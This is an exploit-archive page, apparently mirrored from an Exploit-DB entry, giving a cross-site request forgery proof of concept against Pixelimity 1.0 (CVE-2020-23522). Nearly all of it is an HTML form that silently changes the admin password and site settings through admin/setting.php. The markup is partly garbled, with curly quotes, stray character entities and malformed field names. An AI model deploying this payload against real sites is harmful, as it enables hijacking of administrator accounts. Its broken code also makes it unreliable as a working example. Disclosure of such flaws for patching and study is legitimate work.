扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery # Date: 2020-06-03 # Exploit Author: Noth # Vendor Homepage: https://github.com/pixelimity/pixelimity # Software Link: https://github.com/pixelimity/pixelimity # Version: v1.0 # CVE : 2020-23522 Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter. PoC : <html> <body> <script>history.pushState(",",'/')</script> <form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php ” method=“POST”> <input type=“hidden” name=“submit_setting” value=“Save Setting”/> <input type=“hidden” name=“data[admin_portfolio_show]” value=“5”/> <input type=“hidden” name=“data[admin_pages_show]” value=“5”/> <input type=“hidden” name=“admin[data_password]” value=“456789”/> <input type=“hidden” name=“data[site#95;name]" value=“Pixelimity”/> <input type=“hidden” name=“data[site_name]show]” value=“My Online Portfolio”/> <input type=“hidden” name=“data[home_image_size]” value=“5”/> <input type=“hidden” name=“ data[single_image_image_size#93 ” value=“ 240&44;0,0&44;auto ”/> <input type=“hidden” name=“data[single_image_image_size#93” value=“720&44;0,0&44;auto”/> <input type=“submit” value=“Submit request”/> </form> </body> </html> |
体验盒子
